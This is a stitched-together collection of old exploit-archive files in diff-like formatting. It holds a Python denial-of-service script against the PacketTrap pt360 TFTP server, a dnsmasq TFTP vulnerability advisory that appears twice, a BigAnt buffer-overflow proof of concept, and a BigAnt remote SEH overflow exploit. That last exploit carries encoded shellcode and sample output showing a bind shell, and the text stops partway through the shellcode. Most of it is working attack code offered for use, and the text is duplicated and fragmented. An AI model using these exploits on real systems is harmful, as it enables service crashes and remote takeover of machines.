#!/usr/bin/python
|
||||
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
|
||||
# Coded by Mati Aharoni
|
||||
# muts..at..offensive-security.com
|
||||
# http://www.offensive-security.com/0day/pt360dos.py.txt
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
host = '172.16.167.134'
|
||||
port = 69
|
||||
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
except:
|
||||
print "socket() failed"
|
||||
sys.exit(1)
|
||||
|
||||
filename = '"'*160
|
||||
mode = "netascii"
|
||||
muha = "\x00\x02" + filename + "\0" + mode + "\0"
|
||||
s.sendto(muha, (host, port))
|
||||
|
||||
# milw0rm.com [2008-03-26]
|
||||
|
|
|
@ -1,281 +1,281 @@
|
|||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA1
|
||||
|
||||
Core Security Technologies - CoreLabs Advisory
|
||||
http://www.coresecurity.com/corelabs/
|
||||
|
||||
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
|
||||
|
||||
1. *Advisory Information*
|
||||
|
||||
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
Advisory ID: CORE-2009-0820
|
||||
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
|
||||
Date published: 2009-08-31
|
||||
Date of last update: 2009-08-31
|
||||
Vendors contacted: Simon Kelley
|
||||
Release mode: Coordinated release
|
||||
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Buffer overflow
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: No
|
||||
Bugtraq ID: 36120, 36121
|
||||
CVE Name: CVE-2009-2957, CVE-2009-2958
|
||||
|
||||
|
||||
3. *Vulnerability Description*
|
||||
|
||||
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
|
||||
has been found that may allow an attacker to execute arbitrary code on
|
||||
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
|
||||
enabled ('--enable-tfp'). This service is not enabled by default on most
|
||||
distributions; in particular it is not enabled by default on OpenWRT or
|
||||
DD-WRT. Chances of successful exploitation increase when a long
|
||||
directory prefix is used for TFTP. Code will be executed with the
|
||||
privileges of the user running dnsmasq, which is normally a
|
||||
non-privileged one.
|
||||
|
||||
Additionally there is a potential DoS attack to the TFTP service by
|
||||
exploiting a null-pointer dereference vulnerability.
|
||||
|
||||
|
||||
4. *Vulnerable packages*
|
||||
|
||||
. dnsmasq 2.40.
|
||||
. dnsmasq 2.41.
|
||||
. dnsmasq 2.42.
|
||||
. dnsmasq 2.43.
|
||||
. dnsmasq 2.44.
|
||||
. dnsmasq 2.45.
|
||||
. dnsmasq 2.46.
|
||||
. dnsmasq 2.47.
|
||||
. dnsmasq 2.48.
|
||||
. dnsmasq 2.49.
|
||||
. Older versions are probably affected too, but they were not checked.
|
||||
|
||||
|
||||
5. *Non-vulnerable packages*
|
||||
|
||||
. dnsmasq 2.50
|
||||
|
||||
|
||||
6. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
If the TFTP service is enabled and patching is not available
|
||||
immediately, a valid workaround is to filter TFTP for untrusted hosts in
|
||||
the network (such as the Internet). This is the default configuration
|
||||
when enabling TFTP on most home routers.
|
||||
|
||||
Patches are already available from the software author. Most
|
||||
distributions should release updates for binary packages soon.
|
||||
|
||||
|
||||
7. *Credits*
|
||||
|
||||
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
|
||||
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
|
||||
Herederos de Don Pablo" of Core Security Technologies.
|
||||
|
||||
The null-pointer dereference (CVE-2009-2958) was reported to the author
|
||||
of dnsmasq independently by an uncredited code auditor. It was merged
|
||||
with this advisory for user's convenience.
|
||||
|
||||
|
||||
8. *Technical Description*
|
||||
|
||||
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
|
||||
|
||||
First let's focus on the overflow vulnerability. The 'tftp_request'
|
||||
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
|
||||
'MAXDNAME' bytes (defaulting to 1025).
|
||||
|
||||
/-----------
|
||||
else if (filename[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, filename, MAXDNAME);
|
||||
- -----------/
|
||||
|
||||
This may cause a heap overflow because 'daemon->namebuff' may already
|
||||
contain data, namely the configured 'daemon->tftp_prefix' passed to the
|
||||
daemon via a configuration file.
|
||||
|
||||
/-----------
|
||||
if (daemon->tftp_prefix)
|
||||
{
|
||||
if (daemon->tftp_prefix[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
|
||||
- -----------/
|
||||
|
||||
The default prefix is '/var/tftpd', but if a longer prefix is used,
|
||||
arbitrary code execution may be possible.
|
||||
|
||||
Sending the string resulting from the execution of the following python
|
||||
snippet to a vulnerable server, with a long enough directory prefix
|
||||
configured, should crash the daemon.
|
||||
|
||||
/-----------
|
||||
import sys
|
||||
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
|
||||
- -----------/
|
||||
|
||||
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
|
||||
|
||||
Now onto the null-pointer dereference. The user can crash the service by
|
||||
handcrafting a packet, because of a problem on the guard of the first if
|
||||
inside this code loop:
|
||||
|
||||
/-----------
|
||||
while ((opt = next(&p, end)))
|
||||
{
|
||||
if (strcasecmp(opt, "blksize") == 0 &&
|
||||
(opt = next(&p, end)) &&
|
||||
!(daemon->options & OPT_TFTP_NOBLOCK))
|
||||
{
|
||||
transfer->blocksize = atoi(opt);
|
||||
if (transfer->blocksize < 1)
|
||||
transfer->blocksize = 1;
|
||||
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
|
||||
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
|
||||
transfer->opt_blocksize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
|
||||
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
|
||||
!transfer->netascii)
|
||||
{
|
||||
transfer->opt_transize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
}
|
||||
- -----------/
|
||||
|
||||
The problem exists because the guard of the first if includes the result
|
||||
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
|
||||
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
|
||||
derrefence the null-pointer.
|
||||
|
||||
|
||||
9. *Report Timeline*
|
||||
|
||||
. 2009-08-20:
|
||||
Core Security Technologies notifies Simon Kelley of the vulnerability,
|
||||
including technical details of the vulnerability in an advisory draft.
|
||||
|
||||
. 2009-08-21:
|
||||
Simon Kelley acknowledges the vulnerability and confirms to be working
|
||||
on a patch. He also informs that he is aware that most home router
|
||||
distributions have tftp turned off by default, and firewalled, and
|
||||
suggests this should be mentioned on the advisory. Simon also mentions
|
||||
that a NULL-pointer dereference bug has also been discovered on that
|
||||
code, and suggests merging both bugs in the same advisory. Monday 31/08
|
||||
is accepted as a possible release date for this advisory, and help is
|
||||
offered in contacting package maintainers of dnsmasq for most operating
|
||||
systems.
|
||||
|
||||
. 2009-08-21:
|
||||
Core changes the advisory draft to accommodate Simon's suggestions.
|
||||
About the NULL-pointer dereference, Core mentions the terms it thinks
|
||||
appropriate for the bug to be merged into this advisory, and details how
|
||||
this would affect the following procedures, such as asking for a
|
||||
CVE/Bugtraq ID.
|
||||
|
||||
. 2009-08-23:
|
||||
Simon Kelley contacts Core back, saying that the terms for the
|
||||
null-pointer derrefence bug to be included in the advisory are ok. He
|
||||
also mentions that the finder of this bug prefers to remain uncredited
|
||||
in this advisory. Details are sent by him about the new bug so that the
|
||||
advisory draft can be updated to include it.
|
||||
|
||||
. 2009-08-23:
|
||||
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
|
||||
each vulnerability reported in this advisory should be assigned its own.
|
||||
|
||||
. 2009-08-23:
|
||||
Vincent Danen, from Red Hat's Security Response Team contacts Core in
|
||||
order to discuss both vulnerabilities by a secure communications
|
||||
channel, and offers its help in obtaining proper CVE numbers, specifying
|
||||
they also believe a separate number should be assigned to each
|
||||
vulnerability.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Vincent Danen by sending its gpg key. Core also mentions
|
||||
separate CVE numbers have already been asked.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Simon Kelley, including a new advisory draft with both
|
||||
bugs merged.
|
||||
|
||||
. 2009-08-23:
|
||||
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
|
||||
them to Red Hat and Simon Kelley.
|
||||
|
||||
. 2009-08-31:
|
||||
The advisory CORE-2009-0820 is published.
|
||||
|
||||
|
||||
10. *References*
|
||||
|
||||
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
|
||||
[2] http://www.isi.edu/in-notes/ien/ien133.txt
|
||||
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
|
||||
|
||||
|
||||
11. *About CoreLabs*
|
||||
|
||||
CoreLabs, the research center of Core Security Technologies, is charged
|
||||
with anticipating the future needs and requirements for information
|
||||
security technologies. We conduct our research in several important
|
||||
areas of computer security including system vulnerabilities, cyber
|
||||
attack planning and simulation, source code auditing, and cryptography.
|
||||
Our results include problem formalization, identification of
|
||||
vulnerabilities, novel solutions and prototypes for new technologies.
|
||||
CoreLabs regularly publishes security advisories, technical papers,
|
||||
project information and shared software tools for public use at:
|
||||
http://www.coresecurity.com/corelabs.
|
||||
|
||||
|
||||
12. *About Core Security Technologies*
|
||||
|
||||
Core Security Technologies develops strategic solutions that help
|
||||
security-conscious organizations worldwide develop and maintain a
|
||||
proactive process for securing their networks. The company's flagship
|
||||
product, CORE IMPACT, is the most comprehensive product for performing
|
||||
enterprise security assurance testing. CORE IMPACT evaluates network,
|
||||
endpoint and end-user vulnerabilities and identifies what resources are
|
||||
exposed. It enables organizations to determine if current security
|
||||
investments are detecting and preventing attacks. Core Security
|
||||
Technologies augments its leading technology solution with world-class
|
||||
security consulting services, including penetration testing and software
|
||||
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
|
||||
Security Technologies can be reached at 617-399-6980 or on the Web at
|
||||
http://www.coresecurity.com.
|
||||
|
||||
|
||||
13. *Disclaimer*
|
||||
|
||||
The contents of this advisory are copyright (c) 2009 Core Security
|
||||
Technologies and (c) 2009 CoreLabs, and may be distributed freely
|
||||
provided that no fee is charged for this distribution and proper credit
|
||||
is given.
|
||||
|
||||
|
||||
14. *PGP/GPG Keys*
|
||||
|
||||
This advisory has been signed with the GPG key of Core Security
|
||||
Technologies advisories team, which is available for download at
|
||||
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
|
||||
-----BEGIN PGP SIGNATURE-----
|
||||
Version: GnuPG v1.4.7 (MingW32)
|
||||
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
|
||||
|
||||
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
|
||||
wa3syAdyXlixVdQhdk5vcK0=
|
||||
=tfqM
|
||||
-----END PGP SIGNATURE-----
|
||||
|
||||
# milw0rm.com [2009-09-09]
|
||||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA1
|
||||
|
||||
Core Security Technologies - CoreLabs Advisory
|
||||
http://www.coresecurity.com/corelabs/
|
||||
|
||||
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
|
||||
|
||||
1. *Advisory Information*
|
||||
|
||||
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
Advisory ID: CORE-2009-0820
|
||||
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
|
||||
Date published: 2009-08-31
|
||||
Date of last update: 2009-08-31
|
||||
Vendors contacted: Simon Kelley
|
||||
Release mode: Coordinated release
|
||||
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Buffer overflow
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: No
|
||||
Bugtraq ID: 36120, 36121
|
||||
CVE Name: CVE-2009-2957, CVE-2009-2958
|
||||
|
||||
|
||||
3. *Vulnerability Description*
|
||||
|
||||
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
|
||||
has been found that may allow an attacker to execute arbitrary code on
|
||||
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
|
||||
enabled ('--enable-tfp'). This service is not enabled by default on most
|
||||
distributions; in particular it is not enabled by default on OpenWRT or
|
||||
DD-WRT. Chances of successful exploitation increase when a long
|
||||
directory prefix is used for TFTP. Code will be executed with the
|
||||
privileges of the user running dnsmasq, which is normally a
|
||||
non-privileged one.
|
||||
|
||||
Additionally there is a potential DoS attack to the TFTP service by
|
||||
exploiting a null-pointer dereference vulnerability.
|
||||
|
||||
|
||||
4. *Vulnerable packages*
|
||||
|
||||
. dnsmasq 2.40.
|
||||
. dnsmasq 2.41.
|
||||
. dnsmasq 2.42.
|
||||
. dnsmasq 2.43.
|
||||
. dnsmasq 2.44.
|
||||
. dnsmasq 2.45.
|
||||
. dnsmasq 2.46.
|
||||
. dnsmasq 2.47.
|
||||
. dnsmasq 2.48.
|
||||
. dnsmasq 2.49.
|
||||
. Older versions are probably affected too, but they were not checked.
|
||||
|
||||
|
||||
5. *Non-vulnerable packages*
|
||||
|
||||
. dnsmasq 2.50
|
||||
|
||||
|
||||
6. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
If the TFTP service is enabled and patching is not available
|
||||
immediately, a valid workaround is to filter TFTP for untrusted hosts in
|
||||
the network (such as the Internet). This is the default configuration
|
||||
when enabling TFTP on most home routers.
|
||||
|
||||
Patches are already available from the software author. Most
|
||||
distributions should release updates for binary packages soon.
|
||||
|
||||
|
||||
7. *Credits*
|
||||
|
||||
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
|
||||
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
|
||||
Herederos de Don Pablo" of Core Security Technologies.
|
||||
|
||||
The null-pointer dereference (CVE-2009-2958) was reported to the author
|
||||
of dnsmasq independently by an uncredited code auditor. It was merged
|
||||
with this advisory for user's convenience.
|
||||
|
||||
|
||||
8. *Technical Description*
|
||||
|
||||
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
|
||||
|
||||
First let's focus on the overflow vulnerability. The 'tftp_request'
|
||||
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
|
||||
'MAXDNAME' bytes (defaulting to 1025).
|
||||
|
||||
/-----------
|
||||
else if (filename[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, filename, MAXDNAME);
|
||||
- -----------/
|
||||
|
||||
This may cause a heap overflow because 'daemon->namebuff' may already
|
||||
contain data, namely the configured 'daemon->tftp_prefix' passed to the
|
||||
daemon via a configuration file.
|
||||
|
||||
/-----------
|
||||
if (daemon->tftp_prefix)
|
||||
{
|
||||
if (daemon->tftp_prefix[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
|
||||
- -----------/
|
||||
|
||||
The default prefix is '/var/tftpd', but if a longer prefix is used,
|
||||
arbitrary code execution may be possible.
|
||||
|
||||
Sending the string resulting from the execution of the following python
|
||||
snippet to a vulnerable server, with a long enough directory prefix
|
||||
configured, should crash the daemon.
|
||||
|
||||
/-----------
|
||||
import sys
|
||||
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
|
||||
- -----------/
|
||||
|
||||
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
|
||||
|
||||
Now onto the null-pointer dereference. The user can crash the service by
|
||||
handcrafting a packet, because of a problem on the guard of the first if
|
||||
inside this code loop:
|
||||
|
||||
/-----------
|
||||
while ((opt = next(&p, end)))
|
||||
{
|
||||
if (strcasecmp(opt, "blksize") == 0 &&
|
||||
(opt = next(&p, end)) &&
|
||||
!(daemon->options & OPT_TFTP_NOBLOCK))
|
||||
{
|
||||
transfer->blocksize = atoi(opt);
|
||||
if (transfer->blocksize < 1)
|
||||
transfer->blocksize = 1;
|
||||
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
|
||||
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
|
||||
transfer->opt_blocksize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
|
||||
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
|
||||
!transfer->netascii)
|
||||
{
|
||||
transfer->opt_transize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
}
|
||||
- -----------/
|
||||
|
||||
The problem exists because the guard of the first if includes the result
|
||||
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
|
||||
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
|
||||
derrefence the null-pointer.
|
||||
|
||||
|
||||
9. *Report Timeline*
|
||||
|
||||
. 2009-08-20:
|
||||
Core Security Technologies notifies Simon Kelley of the vulnerability,
|
||||
including technical details of the vulnerability in an advisory draft.
|
||||
|
||||
. 2009-08-21:
|
||||
Simon Kelley acknowledges the vulnerability and confirms to be working
|
||||
on a patch. He also informs that he is aware that most home router
|
||||
distributions have tftp turned off by default, and firewalled, and
|
||||
suggests this should be mentioned on the advisory. Simon also mentions
|
||||
that a NULL-pointer dereference bug has also been discovered on that
|
||||
code, and suggests merging both bugs in the same advisory. Monday 31/08
|
||||
is accepted as a possible release date for this advisory, and help is
|
||||
offered in contacting package maintainers of dnsmasq for most operating
|
||||
systems.
|
||||
|
||||
. 2009-08-21:
|
||||
Core changes the advisory draft to accommodate Simon's suggestions.
|
||||
About the NULL-pointer dereference, Core mentions the terms it thinks
|
||||
appropriate for the bug to be merged into this advisory, and details how
|
||||
this would affect the following procedures, such as asking for a
|
||||
CVE/Bugtraq ID.
|
||||
|
||||
. 2009-08-23:
|
||||
Simon Kelley contacts Core back, saying that the terms for the
|
||||
null-pointer derrefence bug to be included in the advisory are ok. He
|
||||
also mentions that the finder of this bug prefers to remain uncredited
|
||||
in this advisory. Details are sent by him about the new bug so that the
|
||||
advisory draft can be updated to include it.
|
||||
|
||||
. 2009-08-23:
|
||||
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
|
||||
each vulnerability reported in this advisory should be assigned its own.
|
||||
|
||||
. 2009-08-23:
|
||||
Vincent Danen, from Red Hat's Security Response Team contacts Core in
|
||||
order to discuss both vulnerabilities by a secure communications
|
||||
channel, and offers its help in obtaining proper CVE numbers, specifying
|
||||
they also believe a separate number should be assigned to each
|
||||
vulnerability.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Vincent Danen by sending its gpg key. Core also mentions
|
||||
separate CVE numbers have already been asked.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Simon Kelley, including a new advisory draft with both
|
||||
bugs merged.
|
||||
|
||||
. 2009-08-23:
|
||||
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
|
||||
them to Red Hat and Simon Kelley.
|
||||
|
||||
. 2009-08-31:
|
||||
The advisory CORE-2009-0820 is published.
|
||||
|
||||
|
||||
10. *References*
|
||||
|
||||
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
|
||||
[2] http://www.isi.edu/in-notes/ien/ien133.txt
|
||||
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
|
||||
|
||||
|
||||
11. *About CoreLabs*
|
||||
|
||||
CoreLabs, the research center of Core Security Technologies, is charged
|
||||
with anticipating the future needs and requirements for information
|
||||
security technologies. We conduct our research in several important
|
||||
areas of computer security including system vulnerabilities, cyber
|
||||
attack planning and simulation, source code auditing, and cryptography.
|
||||
Our results include problem formalization, identification of
|
||||
vulnerabilities, novel solutions and prototypes for new technologies.
|
||||
CoreLabs regularly publishes security advisories, technical papers,
|
||||
project information and shared software tools for public use at:
|
||||
http://www.coresecurity.com/corelabs.
|
||||
|
||||
|
||||
12. *About Core Security Technologies*
|
||||
|
||||
Core Security Technologies develops strategic solutions that help
|
||||
security-conscious organizations worldwide develop and maintain a
|
||||
proactive process for securing their networks. The company's flagship
|
||||
product, CORE IMPACT, is the most comprehensive product for performing
|
||||
enterprise security assurance testing. CORE IMPACT evaluates network,
|
||||
endpoint and end-user vulnerabilities and identifies what resources are
|
||||
exposed. It enables organizations to determine if current security
|
||||
investments are detecting and preventing attacks. Core Security
|
||||
Technologies augments its leading technology solution with world-class
|
||||
security consulting services, including penetration testing and software
|
||||
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
|
||||
Security Technologies can be reached at 617-399-6980 or on the Web at
|
||||
http://www.coresecurity.com.
|
||||
|
||||
|
||||
13. *Disclaimer*
|
||||
|
||||
The contents of this advisory are copyright (c) 2009 Core Security
|
||||
Technologies and (c) 2009 CoreLabs, and may be distributed freely
|
||||
provided that no fee is charged for this distribution and proper credit
|
||||
is given.
|
||||
|
||||
|
||||
14. *PGP/GPG Keys*
|
||||
|
||||
This advisory has been signed with the GPG key of Core Security
|
||||
Technologies advisories team, which is available for download at
|
||||
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
|
||||
-----BEGIN PGP SIGNATURE-----
|
||||
Version: GnuPG v1.4.7 (MingW32)
|
||||
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
|
||||
|
||||
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
|
||||
wa3syAdyXlixVdQhdk5vcK0=
|
||||
=tfqM
|
||||
-----END PGP SIGNATURE-----
|
||||
|
||||
# milw0rm.com [2009-09-09]
|
||||
|
|
|
@ -1,18 +1,18 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
#######################################################################
|
||||
#
|
||||
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
|
||||
# Found By: Dr_IDE
|
||||
# Tested: XPSP3
|
||||
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
|
||||
#
|
||||
#######################################################################
|
||||
|
||||
buff = ("\x41" * 10000)
|
||||
|
||||
f1 = open("BigAntUpdate.zip","w")
|
||||
f1.write(buff)
|
||||
f1.close()
|
||||
|
||||
# milw0rm.com [2009-09-16]
|
||||
#!/usr/bin/env python
|
||||
|
||||
#######################################################################
|
||||
#
|
||||
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
|
||||
# Found By: Dr_IDE
|
||||
# Tested: XPSP3
|
||||
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
|
||||
#
|
||||
#######################################################################
|
||||
|
||||
buff = ("\x41" * 10000)
|
||||
|
||||
f1 = open("BigAntUpdate.zip","w")
|
||||
f1.write(buff)
|
||||
f1.close()
|
||||
|
||||
# milw0rm.com [2009-09-16]
|
||||
|
|
|
@ -1,122 +1,122 @@
|
|||
#!/usr/bin/python
|
||||
###############################################################################
|
||||
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
|
||||
# Matteo Memelli aka ryujin
|
||||
# www.be4mind.com - www.gray-world.net
|
||||
# 04/13/2008
|
||||
# Tested on Windows 2000 Sp4 English
|
||||
# Vulnerable process is AntServer.exe
|
||||
# Offset for SEH overwrite is 954 Bytes
|
||||
#
|
||||
#------------------------------------------------------------------------------
|
||||
# muts you gave me the wrong pill! it's your fault!!!
|
||||
# I wanna go back to the matrix
|
||||
#------------------------------------------------------------------------------
|
||||
#
|
||||
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
|
||||
# [+] Connecting to host...
|
||||
# [+] Overflowing the buffer...
|
||||
# [+] Done! Check your shell on 192.168.1.195:6080
|
||||
# bt ~ # nc -vv 192.168.1.195 4444
|
||||
# 192.168.1.195: inverse host lookup failed: Unknown host
|
||||
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
|
||||
# Microsoft Windows 2000 [Version 5.00.2195]
|
||||
# (C) Copyright 1985-2000 Microsoft Corp.
|
||||
#
|
||||
# C:\WINNT\system32>
|
||||
#
|
||||
###############################################################################
|
||||
from socket import *
|
||||
from optparse import OptionParser
|
||||
import sys
|
||||
|
||||
print "[*********************************************************************]"
|
||||
print "[* *]"
|
||||
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
|
||||
print "[* Discovered and Coded By *]"
|
||||
print "[* Matteo Memelli *]"
|
||||
print "[* (ryujin) *]"
|
||||
print "[* www.be4mind.com - www.gray-world.net *]"
|
||||
print "[* *]"
|
||||
print "[*********************************************************************]"
|
||||
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-H", "--target_host", type="string",
|
||||
action="store", dest="HOST",
|
||||
help="Target Host")
|
||||
parser.add_option("-P", "--target_port", type="int",
|
||||
action="store", dest="PORT",
|
||||
help="Target Port")
|
||||
(options, args) = parser.parse_args()
|
||||
HOST = options.HOST
|
||||
PORT = options.PORT
|
||||
if not (HOST and PORT):
|
||||
parser.print_help()
|
||||
sys.exit()
|
||||
|
||||
# Tried with SEH/THREAD/PROCESS but server crashes anyway
|
||||
# [*] x86/alpha_mixed succeeded, final size 698 SEH
|
||||
shellcode = (
|
||||
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
|
||||
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
|
||||
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
|
||||
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
|
||||
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
|
||||
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
|
||||
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
|
||||
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
|
||||
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
|
||||
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
|
||||
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
|
||||
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
|
||||
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
|
||||
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
|
||||
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
|
||||
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
|
||||
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
|
||||
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
|
||||
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
|
||||
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
|
||||
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
|
||||
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
|
||||
